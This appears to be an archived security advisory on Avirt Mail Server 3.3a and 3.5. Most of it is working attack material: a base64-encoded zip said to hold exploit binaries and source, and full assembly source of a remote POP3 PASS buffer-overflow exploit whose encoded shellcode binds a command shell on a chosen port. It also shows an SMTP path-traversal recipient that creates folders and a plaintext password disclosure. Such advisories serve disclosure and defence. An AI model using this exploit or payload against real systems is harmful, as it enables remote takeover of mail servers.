COMMAND
Avirt Mail Server
SYSTEMS AFFECTED
Avirt Mail Server 3.3a or 3.5
PROBLEM
Luciano Martins found following. He found a remotely exploitable
buffer overflow in the Avirt Mail Server 3.3a and a D.o.S in the
version 3.5, (long USER / PASS:) that may allow an attacker to
execute arbitrary code on the target server. Example:
[hell@mordoc]$ telnet example.com 110 <<<< sorry are port 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK aVirt Mail POP3 Server Ready
user itsme
+OK
Pass [buffer]
Where [buffer] is aprox. 856 characters. At his point the server
overflows and crashes. Just a typical buffer overflow. To get
binary or source code for 3.3a win98 Remote exploit go to
http://www.ussrback.com/avirtro/
To get binary or source code for 3.5 D.o.S go to
http://www.ussrback.com/avirtro/
These exploits are placed in avirtsc.zip
---
Content-Type: application/octet-stream; name="avirtsc.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="avirtsc.zip"
Content-MD5: 7v9FUbm//OoJCb83IHqgag==
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
-----
An exploit for Avirt 3.5 (NT) and a temporary patch are available
at
http://www.beavuh.org
The exploit spawns a command prompt on a port you specify and the
patch will prevent this particular overflow.
; The binary is available at http://www.beavuh.org.
;
; To assemble:
;
; tasm32 -ml avirtx.asm
; tlink32 -Tpe -c -x avirtx.obj ,,, import32
;
; TASM 5 required!
;
; dark spyrit <dspyrit@beavuh.org>
.386p
locals
jumps
.model flat, stdcall
extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC
.data
sploit_length equ 783
sploit:
db "PASS "
db 016h, 05bh, 05bh, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 08bh, 0feh, 033h, 0c0h, 050h, 0f7h, 0d0h
db 050h, 059h, 0f2h, 0afh, 059h, 0b1h, 0c6h, 08bh, 0c7h, 048h, 080h, 030h
db 099h, 0e2h, 0fah, 033h, 0f6h, 096h, 0bbh, 099h, 0b0h, 090h, 041h, 0c1h
db 0ebh, 008h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 00bh
db 049h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h
db 0b3h, 08ch, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 032h, 0c0h, 0ach
db 084h, 0c0h, 075h, 0f9h, 0b3h, 0b0h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch
db 033h, 0c9h, 0b1h, 006h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h
db 051h, 056h, 052h, 0b3h, 08ch, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech
db 083h, 0c6h, 005h, 033h, 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h
db 0e8h, 093h, 06ah, 010h, 056h, 053h, 0ffh, 057h, 0ech, 06ah, 002h, 053h
db 0ffh, 057h, 0f0h, 033h, 0c0h, 057h, 050h, 0b0h, 00ch, 0abh, 058h, 0abh
db 040h, 0abh, 05fh, 048h, 050h, 057h, 056h, 0adh, 056h, 0ffh, 057h, 0c0h
db 048h, 050h, 057h, 0adh, 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 0b0h
db 044h, 089h, 007h, 057h, 0ffh, 057h, 0c4h, 033h, 0c0h, 08bh, 046h, 0f4h
db 089h, 047h, 03ch, 089h, 047h, 040h, 08bh, 006h, 089h, 047h, 038h, 033h
db 0c0h, 066h, 0b8h, 001h, 001h, 089h, 047h, 02ch, 057h, 057h, 033h, 0c0h
db 050h, 050h, 050h, 040h, 050h, 048h, 050h, 050h, 0adh, 056h, 033h, 0c0h
db 050h, 0ffh, 057h, 0c8h, 0ffh, 076h, 0f0h, 0ffh, 057h, 0cch, 0ffh, 076h
db 0fch, 0ffh, 057h, 0cch, 048h, 050h, 050h, 053h, 0ffh, 057h, 0f4h, 08bh
db 0d8h, 033h, 0c0h, 0b4h, 004h, 050h, 0c1h, 0e8h, 004h, 050h, 0ffh, 057h
db 0d4h, 08bh, 0f0h, 033h, 0c0h, 08bh, 0c8h, 0b5h, 004h, 050h, 050h, 057h
db 051h, 050h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0d0h, 083h, 03fh, 001h, 07ch
db 022h, 033h, 0c0h, 050h, 057h, 0ffh, 037h, 056h, 0ffh, 077h, 0a8h, 0ffh
db 057h, 0dch, 00bh, 0c0h, 074h, 02fh, 033h, 0c0h, 050h, 0ffh, 037h, 056h
db 053h, 0ffh, 057h, 0f8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0c8h, 033h
db 0c0h, 050h, 0b4h, 004h, 050h, 056h, 053h, 0ffh, 057h, 0fch, 057h, 033h
db 0c9h, 051h, 050h, 056h, 0ffh, 077h, 0ach, 0ffh, 057h, 0d8h, 06ah, 050h
db 0ffh, 057h, 0e0h, 0ebh, 0aah, 050h, 0ffh, 057h, 0e4h, 090h, 0d2h, 0dch
db 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh
db 0fch, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h
db 0ebh, 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h, 0dah, 0ebh
db 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 0d8h
db 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h, 0f8h, 0f7h, 0fdh, 0f5h, 0fch
db 099h, 0c9h, 0fch, 0fch, 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h
db 0e9h, 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h, 0f5h, 0f5h
db 0f6h, 0fah, 099h, 0ceh, 0ebh, 0f0h, 0edh, 0fch, 0dfh, 0f0h, 0f5h, 0fch
db 099h, 0cbh, 0fch, 0f8h, 0fdh, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h
db 0fch, 0fch, 0e9h, 099h, 0dch, 0e1h, 0f0h, 0edh, 0c9h, 0ebh, 0f6h, 0fah
db 0fch, 0eah, 0eah, 099h, 0ceh, 0cah, 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h
db 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah, 0fah, 0fch, 0e9h
db 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh, 099h, 0ebh, 0fch, 0fah, 0efh, 099h
db 09bh, 099h
store dw ?
db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
db 099h, 099h, 099h, 099h, 0fah, 0f4h, 0fdh, 0b7h, 0fch, 0e1h, 0fch, 099h
db 0ffh, 0ffh, 0ffh, 0ffh, 090h, 090h, 090h, 090h, 090h, 05fh, 029h, 040h
db 000h, 00dh, 00ah
user db "user beavuh",0dh,0ah,0
userl equ $-user
logo db "aVirt Mail Server 3.5 remote.", 13, 10
db "by dark spyrit <dspyrit@beavuh.org>",13,10
db "http://www.beavuh.org",13,10,13,10
db "usage: avirtx <host> <port> <port to bind shell>", 13, 10
db "eg - avirtx host.com 110 1234",13,10,0
logolen equ $-logo
errorinit db 10,"error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit
derror db 10,"error.",13,10,0
derrorl equ $-derror
nohost db 10,"no host or ip specified.", 13,10,0
nohostl equ $-nohost
noport db 10,"no port specified.",13,10,0
noportl equ $-noport
no_port2 db 10,"no bind port specified.",13,10,0
no_port2l equ $-no_port2
response db 10,"waiting for response....",13,10,0
respl equ $-response
reshost db 10,"error resolving host.",13,10,0
reshostl equ $-reshost
sockerr db 10,"error creating socket.",13,10,0
sockerrl equ $-sockerr
ipill db 10,"ip error.",13,10,0
ipilll equ $-ipill
cnerror db 10,"error establishing connection.",13,10,0
cnerrorl equ $-cnerror
success db 10,"sent.. spawn connection now.",13,10,0
successl equ $-success
console_in dd ?
console_out dd ?
bytes_read dd ?
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends
sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends
wsadata WSAdata <?>
sin sockaddr_in <?>
sock dd ?
numbase dd 10
_port db 256 dup (?)
_host db 256 dup (?)
_port2 db 256 dup (?)
buffer db 1000 dup (0)
.code
start:
call init_console
push logolen
push offset logo
call write_console
call GetCommandLineA
mov edi, eax
mov ecx, -1
xor al, al
push edi
repnz scasb
not ecx
pop edi
mov al, 20h
repnz scasb
dec ecx
cmp ch, 0ffh
jz @@0
test ecx, ecx
jnz @@1
@@0:
push nohostl
push offset nohost
call write_console
jmp quit3
@@1:
mov esi, edi
lea edi, _host
call parse
or ecx, ecx
jnz @@2
push noportl
push offset noport
call write_console
jmp quit3
@@2:
lea edi, _port
call parse
or ecx, ecx
jnz @@3
push no_port2l
push offset no_port2
call write_console
jmp quit3
@@3:
push ecx
lea edi, _port2
call parse
push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found
push errorinitl
push offset errorinit
call write_console
jmp quit3
winsock_found:
xor eax, eax
push eax
inc eax
push eax
inc eax
push eax
call socket
cmp eax, -1
jnz socket_ok
push sockerrl
push offset sockerr
call write_console
jmp quit2
socket_ok:
mov sock, eax
mov sin.sin_family, 2
mov ebx, offset _port
call str2num
mov eax, edx
push eax
call htons
mov sin.sin_port, ax
mov ebx, offset _port2
call str2num
mov eax, edx
push eax
call htons
xor ax, 09999h
mov store, ax
mov esi, offset _host
lewp:
xor al, al
lodsb
cmp al, 039h
ja gethost
test al, al
jnz lewp
push offset _host
call inet_addr
cmp eax, -1
jnz ip_aight
push ipilll
push offset ipill
call write_console
jmp quit1
ip_aight:
mov sin.sin_addr, eax
jmp continue
gethost:
push offset _host
call gethostbyname
test eax, eax
jnz gothost
push reshostl
push offset reshost
call write_console
jmp quit1
gothost:
mov eax, [eax+0ch]
mov eax, [eax]
mov eax, [eax]
mov sin.sin_addr, eax
continue:
push size sin
push offset sin
push sock
call connect
or eax, eax
jz connect_ok
push cnerrorl
push offset cnerror
call write_console
jmp quit1
connect_ok:
push respl
push offset response
call write_console
xor eax, eax
push eax
push 1000
push offset buffer
push sock
call recv
or eax, eax
jg sveet
push derrorl
push offset derror
call write_console
jmp quit1
sveet:
push eax
push offset buffer
call write_console
xor eax, eax
push eax
push userl
push offset user
push sock
call send
xor eax, eax
push eax
push 1000
push offset buffer
push sock
call recv
or eax, eax
jg sveet1
push derrorl
push offset derror
call write_console
jmp quit1
sveet1:
push eax
push offset buffer
call write_console
xor eax, eax
push eax
push sploit_length
push offset sploit
push sock
call send
push successl
push offset success
call write_console
quit1:
push sock
call closesocket
quit2:
call WSACleanup
quit3:
push 0
call ExitProcess
parse proc
;cheap parsing..
lewp9:
xor eax, eax
cld
lodsb
cmp al, 20h
jz done
test al, al
jz done2
stosb
dec ecx
jmp lewp9
done:
dec ecx
done2:
ret
endp
str2num proc
push eax ecx edi
xor eax, eax
xor ecx, ecx
xor edx, edx
xor edi, edi
lewp2:
xor al, al
xlat
test al, al
jz end_it
sub al, 030h
mov cl, al
mov eax, edx
mul numbase
add eax, ecx
mov edx, eax
inc ebx
inc edi
cmp edi, 0ah
jnz lewp2
end_it:
pop edi ecx eax
ret
endp
init_console proc
push -10
call GetStdHandle
or eax, eax
je init_error
mov [console_in], eax
push -11
call GetStdHandle
or eax, eax
je init_error
mov [console_out], eax
ret
init_error:
push 0
call ExitProcess
endp
write_console proc text_out:dword, text_len:dword
pusha
push 0
push offset bytes_read
push text_len
push text_out
push console_out
call WriteConsoleA
popa
ret
endp
end start
Another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3
and 3.5 follow.
1) Anybody with console access could retrieve RAS password in
Avirt Gateway. Changing the username in "Internet connection"
properties and pressing "test" button makes Avirt to present a
message box with the password in plaintext.
2) Anybody on the Intranet could make directories anywhere in the
NT running Avirt Mail Server.
telnet 192.168.0.1 25
> 220 server aVirt Mail SMTP Server Ready.
mail from:foo
> 250 foo, Sender OK
rcpt to:..\..\..\..\newfolder
> 250 ..\..\..\..\newfolder, Receipient OK
data
> 354 Please enter mail, ending with a "." on a line by itself
Textinside
.
> 250 Mail accepted.
This will create a root folder named "newfolder" with a file
inside it. Fortunately it appears to be impossible to
overwrite an existing directory.
SOLUTION
Nothing yet. For workaround, see address above.